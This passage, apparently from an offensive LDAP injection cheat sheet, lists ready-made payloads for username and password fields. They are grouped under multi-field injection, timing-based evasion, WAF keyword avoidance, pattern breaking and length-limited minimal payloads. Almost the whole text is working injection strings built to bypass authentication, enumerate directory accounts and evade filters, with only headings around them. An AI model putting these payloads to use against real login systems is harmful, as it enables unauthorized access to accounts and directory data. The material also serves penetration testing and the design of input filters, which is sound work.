# Multi-field injection
username: admin*
department: )(&(memberOf=*admin*
location: )(&(title=*manager*

Timing-Based Evasion

Conditional Delays:

# Large result set timing
username: *)(&(|(uid=a*)(uid=b*)(uid=c*)(uid=d*)(uid=e*
password: anything

# Complex computation timing
username: admin)(&(memberOf=cn=*,ou=groups,ou=*,ou=*,dc=*,dc=*
password: anything

# Recursive attribute lookup
username: admin)(&(manager=cn=*,ou=users,dc=company,dc=com*
password: anything

WAF and Filter Bypass

Common WAF Evasion

Keyword Avoidance:

# Avoid 'admin' keyword
username: adm*)(&(uid=adm*
username: a*in)(&(uid=admin

# Attribute name variations
username: user)(&(samAccountName=admin*  # Instead of uid
username: user)(&(cn=admin*              # Instead of uid
username: user)(&(displayName=admin*    # Instead of uid

Pattern Breaking:

# Break common injection patterns
username: user)(objectClass=person)(&(uid=admin
# Instead of: user)(&(uid=admin

username: user)(!objectClass=computer)(&(uid=admin
# Using negation to break patterns

username: user)(uid>=a)(&(uid<=z)(&(uid=admin
# Using comparison operators

Length-Based Evasion

Payload Truncation:

# Short payloads to avoid length limits
username: *)|(uid=*
username: a*)|(cn=*
username: u*)|(mail=*

# Incremental payload building
# Request 1:
username: admin*
# Request 2 (if first succeeds):
username: admin)(&(uid=*
# Request 3:
username: admin)(&(uid=admin*

Character Limit Bypass:

# Abbreviated attributes
username: admin)(&(cn=*        # Short for commonName
username: admin)(&(sn=*        # Short for surname
username: admin)(&(o=*         # Short for organization

# Minimal viable payloads
username: *)|(uid=*
username: x*)|(cn=*
username: *)|(o=*